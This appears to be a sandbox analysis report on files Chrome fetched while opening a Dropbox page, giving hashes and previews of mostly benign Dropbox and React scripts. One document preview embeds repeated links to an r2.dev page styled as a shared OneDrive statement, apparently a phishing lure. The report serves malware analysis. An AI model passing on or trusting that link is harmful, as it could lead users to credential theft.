                                                    MD5:F25511F4158C2DFAB6AA11A07D026E4A
                                                    SHA1:99F63CF1694FA5E52F43EB967462EA0D9EEF7513
                                                    SHA-256:C0906D540D89DBE1F09B24F17B7F35B81350E8D381C1558B075C28EA913C450D
                                                    SHA-512:0BFB19AEC453A1C4D4B8F39602BF8BBF0A98182A98E29E1E1708EABFD99E3168855994A56061ED462C29B099137C226E25DDD274B46ED2F443C2C515A530B731
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/images/favicon.ico
                                                    Preview:...... .... .........(... ...@..... .........%...%............a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...Q...R...`...b...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...b...]...P....C...=..T...\...b...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a..._...T...a...................a...T..._...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...a...b...[
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (544)
                                                    Category:dropped
                                                    Size (bytes):11440
                                                    Entropy (8bit):5.360613902337515
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:61699B70CF57ABE63FDF5F4007D36EC1
                                                    SHA1:6C05189CC2D08BB2A7609C002F0675C9C670D362
                                                    SHA-256:229BBF4D0E7488209564152C6723497F1AC3934136CA1684233D2FA88FA4146F
                                                    SHA-512:AA5CC8794B5383B781A6611A4B5D8D660C73E766186551799B28FCF668C911EB0177FA04F543EC60E5F64005F3BCE019604BD0A2129D718F33284D3689F5C398
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:/** @license React v17.0.2. * react.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function(){'use strict';(function(c,x){"object"===typeof exports&&"undefined"!==typeof module?x(exports):"function"===typeof define&&define.amd?define(["exports"],x):(c=c||self,x(c.React={}))})(this,function(c){function x(a){if(null===a||"object"!==typeof a)return null;a=Y&&a[Y]||a["@@iterator"];return"function"===typeof a?a:null}function y(a){for(var b="https://reactjs.org/docs/error-decoder.html?invariant="+a,e=1;e<arguments.length;e++)b+="&args[]="+encodeURIComponent(arguments[e]);return"Minified React error #"+.a+"; visit "+b+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}function v(a,b,e){this.props=a;this.context=b;this.refs=Z;this.updater=e||aa}function ba(){}function K(a,b,e
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (923)
                                                    Category:dropped
                                                    Size (bytes):987
                                                    Entropy (8bit):5.126038296206384
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A9F7F0535F07BABD8BA28FB10617E77D
                                                    SHA1:F4FC29B12739810AF0794A1EFC75CC75FA78AB31
                                                    SHA-256:A5B10A186360B24A5F1B2624AE1B314F1731B55C559AE34B95CE00C2859CC379
                                                    SHA-512:D3D16DF60DB1FDB28FDF254138ED22DE266940C9DB9E831A354C1CC7D3018B0BF5131ADFF571AB80E0EE5EED8565186A802ABD13AF5212C56E40AAF799D74B0D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_file_imports_gdrive_file_picker","./c_core_i18n","./c_ts_utils","./e_core_exception"],(function(e,t,r,s,o,i){"use strict";e.chooseGdriveFolder=async e=>{const s=await(async(e,r)=>{const s=new t.DefaultUserApiV2Client(e),{access_token:o}=await t.GetProfileServicesRoutes(s).rpc("get_access_token",{service:{".tag":"google"},permissions:r},{});return o})(e,[{".tag":"documents"}]),o=await r.openGdriveFilePicker(s,void 0,[{viewId:r.FilePickerViewId.FOLDERS,includeFolders:!0,allowSelectFolders:!0}],"root","Select a folder");if(o.action!==r.FilePickerAction.PICKED)return null;const{fileIds:i,filesInfo:c}=o,l=i[0];return{folderId:l,folderName:c[l].name}},e.getDefaultGdssShortcutsTargetFolder=e=>t.UserLocalStorage.get(e,"gdss_shortcuts_target_folder"),e.setDefaultGdssShortcutsTargetFolder=(e,r)=>t.UserLocalStorage.set(e,"gdss_shortcuts_target_folder",r)}));.//# sourceMappingURL=c_gdd_migration_ui_utils.js-vflOmibrL.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (605)
                                                    Category:downloaded
                                                    Size (bytes):120585
                                                    Entropy (8bit):5.370923647345209
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:23BFE7E99565EE8F34AFD63C06F4C24B
                                                    SHA1:BF08B8AD1AD73C12A7C9CB211926CE23A861DB07
                                                    SHA-256:9DB33292007AB6C38527B39D5663E976A305564E19B2A5A8713EA2B2C00F505D
                                                    SHA-512:F6318DAF93E2C1EF27CCB2D84E4F10AC430F7E3194D29C7CD066332995318BB96609FAC18EDC827355799244B9BF1570C0807B429CDCED4C4B890C5F00DDF477
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/react-dom-vflI7_n6Z.js
                                                    Preview:/** @license React v17.0.2. * react-dom.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function(){/*. Modernizr 3.0.0pre (Custom Build) | MIT.*/.'use strict';(function(M,ha){"object"===typeof exports&&"undefined"!==typeof module?ha(exports,require("react")):"function"===typeof define&&define.amd?define(["exports","react"],ha):(M=M||self,ha(M.ReactDOM={},M.React))})(this,function(M,ha){function m(a){for(var b="https://reactjs.org/docs/error-decoder.html?invariant="+a,c=1;c<arguments.length;c++)b+="&args[]="+encodeURIComponent(arguments[c]);return"Minified React error #"+a+"; visit "+b+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}.function Ta(a,b){gb(a,b);gb(a+"Capture",b)}function gb(a,b){Ib[a]=b;for(a=0;a<b.length;a++)zf.add(b[a])}function li(a){if(Af.call(Bf,a)
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (345)
                                                    Category:downloaded
                                                    Size (bytes):719
                                                    Entropy (8bit):5.4268207348578485
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A6BB6938F33DA73E36416F666EEAF4AF
                                                    SHA1:31410C15155D92CF71A9ACE282B528B013402064
                                                    SHA-256:923E7C8A9F076FA33D4BC63072C30744BA4E0251E00C1D3F5B29735E82A0FBC5
                                                    SHA-512:047542FBBF28F632EFBE100AAEF77C9914C358B84B4111683EFDC1FBB3DF577951BB571A6DEEFB99E0EA7CCA826DF82294AAB95AAD035897F88994D863135D06
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/logos-vflprtpOP.css
                                                    Preview:/** @generated -- This file is automatically synced from @dropbox/dig-logos@4.2.0. DO NOT MODIFY! **/../**. This file should not be imported into your CSS or SASS files - the CSS variables will be available on the page for you to use.. DO NOT USE THIS FILE OR THE CSS VARIABLE TOKENS WITHOUT FIRST TALKING TO THE DESIGN SYSTEMS ON-CALL (SEE #design-systems ON SLACK).**/...dig-Mode--bright,:root{--color__glyph__primary:#1e1919;--color__glyph__accent:#0061fe;--color__inverse__glyph__primary:#696663;--color__inverse__glyph__accent:#3984ff}.dig-Mode--dark,.dig-Theme--dark{--color__glyph__primary:#696663;--color__glyph__accent:#3984ff;--color__inverse__glyph__primary:#1e1919;--color__inverse__glyph__accent:#0061fe}
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1513)
                                                    Category:downloaded
                                                    Size (bytes):1588
                                                    Entropy (8bit):5.0939372162692385
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D1C21C320948F07D1670EB8399516FB2
                                                    SHA1:9D0ADC05DC6EF15A8FB3EB77F5893A743E150271
                                                    SHA-256:3BE51C27E7FA0A2255A56862F8B9BF0B577E7FE08387443B7064954BC022D935
                                                    SHA-512:256EAB2BCD8E2E3D01D59E8244EF3FFFF16946B61F5D2FEB67BE654869CEBC48102469E2DEF75FDA3F556BAAE03127952506FF505FF52A0DC0259E7CB72057BA
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_flows_utils_async_modal_launchers-vfl0cIcMg.js
                                                    Preview:define(["require","exports","react","./c_core_i18n","./e_file_viewer_static_scl_page_folder","./c_tagging_data_store","./c_flows_redux_store","./c_flows_redux_actions"],(function(e,t,n,o,i,a,r,l){"use strict";function c(e){return e&&e.__esModule?e:{default:e}}var s=c(n);async function u({operation:t,folderFqPath:n,parentFqPath:r,surface:l,entryPoint:c,initialActionType:u,initialActionData:d,initialScreen:f,initialTriggerType:_,source:w,actionElement:P}){const{WorkflowBuilderComponent:h}=await new Promise((function(t,n){e(["./c_flows_workflow_builder"],t,n)}));var p,g;p=h,g={operation:t,folderFqPath:n,parentFqPath:r,surface:l,entryPoint:c,initialActionType:u,initialScreen:f,initialActionData:d,initialTriggerType:_,source:w,actionElement:P},i.Modal$1.showInstance(s.default.createElement(i.Provider,{store:a.getStoreForBrowse()},s.default.createElement(o.Provider,{value:o.intl},s.default.createElement(p,{...g}))))}t.asyncLaunchAddOrEditAutoFolderModal=async function({fqPath:t,nsId:n,user:o
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (57638)
                                                    Category:dropped
                                                    Size (bytes):57702
                                                    Entropy (8bit):5.100351586256912
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9CA260A17B34D7739A24B9CB9B52134F
                                                    SHA1:0C15966BFB39FF94756B0A2E8E5ADD751685596F
                                                    SHA-256:20380BB03EC80E9B934619C85F5C72B987B244EA618BC105BF56D821E3AF34C9
                                                    SHA-512:EFE4F7E0033831DA05830C1E3AC181A73CF5B93E06559B3ABAA2343C394FF4F9ECA8BC70C7A689A3C967424F050AC2B04209471C0AB1F807E68881B94FFEE097
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./c_ts_utils","./c_api_v2_routes_folders_info_provider","react","./e_core_exception","./c_lodash"],(function(t,e,r,n,s,i){"use strict";function o(t){if(t&&t.__esModule)return t;var e=Object.create(null);return t&&Object.keys(t).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(t,r);Object.defineProperty(e,r,n.get?n:{enumerable:!0,get:function(){return t[r]}})}})),e.default=t,Object.freeze(e)}var a=o(n);class u{constructor(){this.listeners=new Set,this.subscribe=this.subscribe.bind(this)}subscribe(t){const e={listener:t};return this.listeners.add(e),this.onSubscribe(),()=>{this.listeners.delete(e),this.onUnsubscribe()}}hasListeners(){return this.listeners.size>0}onSubscribe(){}onUnsubscribe(){}}const c="undefined"==typeof window||"Deno"in window;function l(){}function h(t){return"number"==typeof t&&t>=0&&t!==1/0}function d(t,e){return Math.max(t+(e||0)-Date.now(),0)}function f(t,e,r){return q(t)?"function"==typeof e?{...r,queryKey:t,queryFn:
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (5246)
                                                    Category:dropped
                                                    Size (bytes):5313
                                                    Entropy (8bit):5.210604225598746
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:103E385E025C4111B60967208245FD88
                                                    SHA1:505B8780115DAF3D6DA09C7E6B299C81D4E50C31
                                                    SHA-256:7FED2D0B1A6E919EF7475CC52C6FDA46A92CD122835E11F0C1390C9EBF49B7C5
                                                    SHA-512:BB57B99547F492848355928A034E498CEA21F909901A4DE77922E4F658BA46FEA04FE61192BEDD7798D3903FCAE20A5B94A911D2274C1F3BDB695BF5B1B475DE
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react","./c_core_i18n","./e_file_viewer_static_scl_page_folder","./c_browse_action_logger"],(function(e,t,a,o,r){"use strict";function s(e){return e&&e.__esModule?e:{default:e}}var n=s(t);const d="flows-automations-snackbar";function i(){return{createInProgress:e=>a.intl.formatMessage({id:"ixnxFP",defaultMessage:"Creating {folderName} automated folder..."},{folderName:e}),addInProgress:e=>a.intl.formatMessage({id:"XWVzJa",defaultMessage:"Adding automation to {folderName}..."},{folderName:e}),feedbackSuccess:a.intl.formatMessage({id:"lXPwmi",defaultMessage:"Thank you for your feedback!"}),createSuccess:e=>a.intl.formatMessage({id:"eqvXsV",defaultMessage:"{folderName} automated folder created."},{folderName:e}),addSuccess:(e,t)=>t?a.intl.formatMessage({id:"4fJng6",defaultMessage:"Automation added to {folderName}. Existing files in this folder will be processed shortly."},{folderName:e}):a.intl.formatMessage({id:"yb+Ei+",defaultMessage:"Automation added to {folderName}.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2321)
                                                    Category:dropped
                                                    Size (bytes):2391
                                                    Entropy (8bit):5.421146217379634
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:7FFAAB560DB0A32DB80A435107A52726
                                                    SHA1:1FB86B02C04F925CFB7A03015BBEF44EFF0DD2A4
                                                    SHA-256:534B4EDC602E0E420601E7E3294B5A2545D5E9228B7E74C117F9FBD37FF9F194
                                                    SHA-512:303B860548EF01C7EF78509222730113FC455AE177FABEA0E848EE5C2FA57F082D2C93F63E4E8796D37093DCB36721BD81CE973C0E0826ED87729914B08B959A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports"],(function(_){"use strict";var E,O;_.OpenButtonAction=void 0,(E=_.OpenButtonAction||(_.OpenButtonAction={}))[E.DOWNLOAD=0]="DOWNLOAD",E[E.UNITY_FILE=1]="UNITY_FILE",E[E.UNITY_FOLDER=2]="UNITY_FOLDER",E[E.OPEN_WITH=3]="OPEN_WITH",E[E.APP_ACTION=5]="APP_ACTION",E[E.PREPARE_FOR_SIGNATURE=6]="PREPARE_FOR_SIGNATURE",E[E.SHARE_TO_SLACK=7]="SHARE_TO_SLACK",E[E.PRESENT_IN_ZOOM=8]="PRESENT_IN_ZOOM",E[E.SHARE_TO_TRELLO=9]="SHARE_TO_TRELLO",E[E.INVITE_VIA_EMAIL=10]="INVITE_VIA_EMAIL",E[E.OPEN_WITH_CLOUD_DOC=11]="OPEN_WITH_CLOUD_DOC",E[E.OPEN_MORE_APPS=12]="OPEN_MORE_APPS",E[E.OPEN_ADD_APPS=13]="OPEN_ADD_APPS",E[E.DECOMPRESS_FILE=14]="DECOMPRESS_FILE",E[E.PREVIEW_FILE=15]="PREVIEW_FILE",E[E.TRANSFER=16]="TRANSFER",E[E.OPEN_IN_DESKTOP=17]="OPEN_IN_DESKTOP",E[E.GO_TO_FOLDER=18]="GO_TO_FOLDER",E[E.OPEN_IN_REPLAY=19]="OPEN_IN_REPLAY",E[E.OPEN_IN_NEW_TAB=20]="OPEN_IN_NEW_TAB",E[E.CONVERT_AND_SHARE=24]="CONVERT_AND_SHARE",E[E.SELL_WITH_SHOP=25]="SELL_WITH_SHOP",E[E.SHARE_WITH_COLLECTIO
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2519)
                                                    Category:dropped
                                                    Size (bytes):2596
                                                    Entropy (8bit):5.2902395668352415
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D658D59CF57F0FF7069507615FB00915
                                                    SHA1:B15D75FDE733F0D6ECD7EE3D1677032F4010496D
                                                    SHA-256:AE07BE6DD51871F417E5EA3DA4B33FA21F116208261E2BBC3C7DCE7FB92DBC61
                                                    SHA-512:F38B9D3A640AB6AE375F484E531A688F826429E62BB872BFE16B89EC671DACA2ECEDE9A28F97BD0818F59F4708A2B4F229ECFABB79CD8FF6525437B7D9C22D98
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var n=r(t);e.CircleStandardFilledFill=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M12 4c-5.159 0-8 2.841-8 8s2.841 8 8 8 8-2.841 8-8-2.841-8-8-8Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.CircleStandardLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M12 4c-5.159 0-8 2.841-8 8s2.841 8 8 8 8-2.841 8-8-2.841-8-8-8Zm0 14.5c-4.374 0-6.5-2.126-6.5-6.5 0-4.374 2.126-6.5 6.5-6.5 4.374 0 6.5 2.126 6.5 6.5 0 4.374-2.126 6.5-6.5 6.5Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.ComputerLine=e=>n.createElement("svg",{viewBox:"0 0 24 24"
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (843)
                                                    Category:downloaded
                                                    Size (bytes):922
                                                    Entropy (8bit):5.1947638906207105
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:90B89F20FD7380D9280597538C533F8D
                                                    SHA1:19D13266100FB9FC1ECAB8354911BDF01609963F
                                                    SHA-256:E8CA1A9BE3B00B5F9A80A0CE842DB5F4EF0324B216EDA5D00D2F4B10F34EEEE6
                                                    SHA-512:FB225428E78809BC5E5F9CE77AA5A3B0D1B9B57F5C4AB8F65E14F0A821F78505792173195EF7AC79C29C43671D828F412870648A36600C081AFCEC1DF27A0FD1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_components_preview_button-vflkLifIP.js
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder"],(function(e,t,r){"use strict";function n(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var i=n(t);r.injectInternalStyle("/static/js/file_viewer/components/preview_button.module.out-vflh2TWhu.css",(e=>"._preview-button_1gfbp_1{letter-spacing:0}"));const o=i.forwardRef((({children:e,color:t="Text Base",...n},o)=>i.createElement(r.Box,{as:r.Button,...n,fontFamily:"Text",fontSize:"Text Medium",fontWeight:"Base",color:n.disabled?"Disabled Base":t,ref:o,className:"_preview-button_1gfbp_1"},e)));o.displayName="PreviewButton",e.PreviewButton=o}));.//# sourceMappingURL=c_file_viewer_components_preview_button.js-vflC2zUPP.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (12509)
                                                    Category:downloaded
                                                    Size (bytes):12571
                                                    Entropy (8bit):5.4092637784486595
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:6F407028CC1A772DECA5E9DBB7D8DC96
                                                    SHA1:A49B26825BC9DFFA275EB4A4721A8FFD1ECABAC1
                                                    SHA-256:CE85230E62AC03FDDD7CDF7DE87F7A69D7AB6AAAE32BF46CC1E46B55C3958F13
                                                    SHA-512:751F67FA09A6B8D86EAA8BC18D484DE9A789C63A15F790CDF957666B7F4344E5D7EC25B283C044144F670F042F32813B8326D06B70F0F8F275733A53F9E78ACC
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_src_common_filepath-vflb0BwKM.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_core_i18n"],(function(e,t,i){"use strict";t.injectInternalStyle("/static/js/file_viewer/file_viewer.module.out-vflDNwGr-.css",(e=>'._fvsdk-mount-point_2087j_1{height:100%;overflow:hidden}._fullScreenPreview_2087j_6{background:var(--dig-color__background__subtle);height:"100vh";position:fixed;right:0;top:0;width:"100vw";z-index:1000}._fileViewerArea_2087j_17{color-scheme:var(--dig-color-scheme,light dark);display:flex;flex-direction:column;height:100%;width:100%}'));t.injectInternalStyle("/static/metaserver/static/js/file_viewer/file_viewer_layout.module.out-vflADVDnJ.css",(e=>"@media (max-width:600px){._container_10wwt_2{width:100%!important}}._editPluginFullscreenContainer_10wwt_6{background:var(--color__standard__background);height:100%}._rendererRow_10wwt_11{background:var(--dig-color__background__subtle);display:flex;flex:1;flex-direction:row;min-height:0;width:100%}._footerRow_10wwt_20{width:100%}._centerSection_10wwt
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2114)
                                                    Category:dropped
                                                    Size (bytes):2191
                                                    Entropy (8bit):5.484347650732722
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:1D4D7A7B606F44C11CB787D0E2961ACF
                                                    SHA1:6C8BE7405F8CCE6A4C506B4ED8EB59D830014DFD
                                                    SHA-256:DC49487B744E3E9C6B7892544D1EEA3F39A8DAFBD5335F31700A56DFD4BA4241
                                                    SHA-512:FAF8590400DFE06A8D1C32912464ABFBC2AF47D2159D8CFCCE7EB010F49ABA97E36E03110823F6F782E68AECFA78CC05210BE52659BEFCF66D84D02BC35ED3AF
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder"],(function(e,a){"use strict";const o=Symbol("ON_ASYNC_SHOW_FROM_BROWSE_GLOBAL_ACTION"),t=Symbol("ON_ASYNC_SHOW_FROM_BROWSE_HOVER_ROW"),_=Symbol("ON_ASYNC_SHOW_FROM_GRID_VIEW_ACTION"),s=Symbol("ON_FALLBACK_FROM_BROWSE_GLOBAL_ACTION"),n=Symbol("ON_FALLBACK_FROM_BROWSE_HOVER_ROW"),l=Symbol("ON_FALLBACK_FROM_GRID_VIEW_ACTION"),d=Symbol("ON_LOADING_WRAPPER_DETECT_SUCCESS"),i=Symbol("ON_LOADING_WRAPPER_DETECT_FAILURE"),E=Symbol("ON_LOADING_WRAPPER_DETECT_CANCEL"),O=Symbol("ON_ASYNC_SHOW_FROM_BROWSE_SHARE_SELECTED_ACTION"),y=new Map,{defaultEmitter:S}=a.defineLogger((async({event:e})=>{if(e.key!==o&&e.key!==t&&e.key!==O&&e.key!==_){if(e.key===s||e.key===n||e.key===l){if(y.get(e.payload.sessionId))return;return y.set(e.payload.sessionId,!0),void a.UDCL.logEnd("ops.sm24.browse_load",{tags:{actionElement:e.payload.actionElement,actionSurface:e.payload.actionSurface},eventState:"canceled",key:e.payload.sessionId})}if(e.key===i){if(y.get(e
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):8878
                                                    Entropy (8bit):4.460285047110174
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F34E6444DCC3F049EAFCD82413F73AC0
                                                    SHA1:7735D2DF261F9D50C8BC62D4B0B6E9A432D4E82E
                                                    SHA-256:AF4D17BBB58470A932068515272789EB3220C0474865A36EACEDAD11A7BE4CB4
                                                    SHA-512:57AD7DB54D360D822126FEB36976B607CDA87AD6C70D6210C6AB09170C43B1C044079821BE3A7AE7E2436824BC8E50F9F865E9A0DE5AB962B5FEC24971035D98
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:{"metadata":{"dimensions":[[612,792,1]],"page_count":1,"schema_version":0},"text":{"fonts":[{"f":262144,"n":"Calibri-Bold"},{"f":0,"n":"Calibri"},{"f":64,"n":"Calibri-Italic"}],"links":{"0":[{"a":{"ur":"https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.html"},"r":[218.539993286133,331.429992675781,4.5,30.9800109863281]},{"a":{"ur":"https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.html"},"r":[218.539993286133,331.429992675781,181.500015258789,30.9800109863281]},{"a":{"ur":"https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.html"},"r":[301.110015869141,207.630004882812,79.8099670410156,8.54000854492188]}]},"pages":{"0":[{"d":0.0,"f":0,"h":15.960000038147,"r":[213.071243286133,594.940002441406,41.5917663574219,10.8208618164062],"t":"Brandi"},{"d":0.0,"f":0,"h":15.960000038147,"r":[259.704559326172,594.940002441406,55.1418151855469,10.852783203125],"t":"shared a"},{"d":0.0,"f":0,"h":15.960000038147,"r":[319.441528320312,5
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (3677)
                                                    Category:dropped
                                                    Size (bytes):3767
                                                    Entropy (8bit):5.281320312564465
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2E4D074088B65A1D7B323CCC1E0863CA
                                                    SHA1:C54ECAD31330DCC41896C5865942D438ACF3EB43
                                                    SHA-256:49FD2145FB2C93AB0D270216E1461ED758B49BB58C57BD0073EF0CB1A112A862
                                                    SHA-512:1D87C6E2CB1E981DCA27240070C49A36A96DBD66748B4D9F0402357519C1F2511C2B1751AE0D0C0265CDDC33940DE5DA53F55AD36D0D570C87CD68C07C95A718
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function l(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(l){if("default"!==l){var n=Object.getOwnPropertyDescriptor(e,l);Object.defineProperty(t,l,n.get?n:{enumerable:!0,get:function(){return e[l]}})}})),t.default=e,Object.freeze(t)}var n=l(t);e.CropLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M7.5 2.5H6V6H2.5v1.5h14V15H18V6H7.5V2.5Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"}),n.createElement("path",{d:"M21.5 16.5h-14V9H6v9h10.5v3.5H18V18h3.5v-1.5Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.CutLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M11.506 8.11a3.018 3.018 0 0 1-.664-.431c-.476-.4-.844-.906-.899-1.533-.055-.627.22-1.189.62-1.665s.905-.844 1.532-.9c.627-.054 1.19.22 1.666.62s.844.906.899 1.533c.054.627-.22
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (9897)
                                                    Category:downloaded
                                                    Size (bytes):9972
                                                    Entropy (8bit):5.2512280831472635
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B0F2C88E751C552595CE2B8C48A7B6C0
                                                    SHA1:2CE5981189CFE50A3C460EEEE239B1CD41B57CE4
                                                    SHA-256:56A4A423AE96AAC3036E4182CF46F6F599981489FD1AF3457704A525E9CE18E1
                                                    SHA-512:14612C1CBB8E9BD5E1DF507CC16CC6CD829B2B545CE9C85DC188FBD3628ABE4954BCCAD4309C2638DEB42F6ECF2A08D62C9330986E6915A71FE23757936D0CB1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_imports_gdrive_file_picker-vflsPLIjn.js
                                                    Preview:define(["exports","./e_core_exception","./e_file_viewer_static_scl_page_folder","react","./c_core_i18n"],(function(e,r,t,o,i){"use strict";function a(e){return e&&e.__esModule?e:{default:e}}var n,l,s,c,d=a(o);!function(e){e.OpenGdriveFilePicker="OpenGdriveFilePicker"}(n||(n={})),e.FilePickerAction=void 0,(l=e.FilePickerAction||(e.FilePickerAction={})).PICKED="PICKED",l.CANCELED="CANCELED",e.FilePickerViewId=void 0,(s=e.FilePickerViewId||(e.FilePickerViewId={})).DOCS="all",s.FOLDERS="folders",function(e){e.IframeLoaded="IframeLoaded",e.FilePickerResult="FilePickerResult",e.SignInWithDifferentAccount="SignInWithDifferentAccount",e.UnhandledError="UnhandledError",e.UnhandledRejection="UnhandledRejection"}(c||(c={}));const p=(e,t,o)=>r.reportStack(t,{severity:e,tags:["FileImports"],exc_extra:o,silent:!1}),u={info:(e,t)=>p(r.SEVERITY.OPERATIONAL,e,t),warn:(e,t)=>p(r.SEVERITY.NONCRITICAL,e,t),error:(e,t)=>p(r.SEVERITY.CRITICAL,e,t),uncaught:(e,t)=>p(r.SEVERITY.UNCAUGHT,e,t)};t.injectInternal
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (10261)
                                                    Category:downloaded
                                                    Size (bytes):10328
                                                    Entropy (8bit):5.281607919199871
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2AFE1BB07DFBD6B05082F22F75823950
